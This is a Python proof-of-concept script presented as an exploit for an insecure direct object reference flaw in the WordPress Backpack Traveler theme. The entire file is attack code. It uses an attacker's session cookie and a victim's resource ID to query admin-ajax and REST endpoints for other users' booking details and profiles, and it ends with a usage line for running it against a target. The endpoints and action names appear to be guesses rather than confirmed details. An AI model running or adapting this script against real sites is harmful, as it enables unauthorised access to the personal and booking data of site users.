# CVE-2025-69030 PoC - Backpack Traveler IDOR Vulnerability
# Author: Security Researcher
# Target: WordPress Backpack Traveler Theme <= 2.10.3
import requests
import argparse
from urllib.parse import urljoin
def exploit_idor(target_url, attacker_cookie, victim_resource_id):
"""
Exploit IDOR vulnerability in Backpack Traveler theme
by manipulating resource identifiers to access unauthorized data
"""
# Target endpoints that may be vulnerable
endpoints = [
'/wp-admin/admin-ajax.php',
'/wp-json/wp/v2/users/',
'/wp-json/backpack/v1/',
]
headers = {
'Cookie': attacker_cookie,
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest'
}
print(f"[*] Testing IDOR on {target_url}")
print(f"[*] Target resource ID: {victim_resource_id}")
# Test various IDOR scenarios
payloads = [
{'action': 'get_booking_details', 'booking_id': victim_resource_id},
{'action': 'get_user_profile', 'user_id': victim_resource_id},
{'id': victim_resource_id},
]
for endpoint in endpoints:
full_url = urljoin(target_url, endpoint)
for payload in payloads:
try:
if 'action' in payload:
response = requests.post(full_url, data=payload, headers=headers, timeout=10)
else:
response = requests.get(full_url + str(victim_resource_id), headers=headers, timeout=10)
if response.status_code == 200 and 'user' in response.text.lower():
print(f"[+] Potential IDOR found at {full_url}")
print(f"[+] Response snippet: {response.text[:200]}")
return True
except requests.RequestException as e:
print(f"[-] Request failed: {e}")
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='CVE-2025-69030 PoC')
parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
parser.add_argument('-c', '--cookie', required=True, help='Attacker session cookie')
parser.add_argument('-r', '--resource', required=True, help='Victim resource ID')
args = parser.parse_args()
exploit_idor(args.url, args.cookie, args.resource)
# Usage: python cve-2025-69030.py -u http://target.com -c "wordpress_logged_in=xxx" -r 1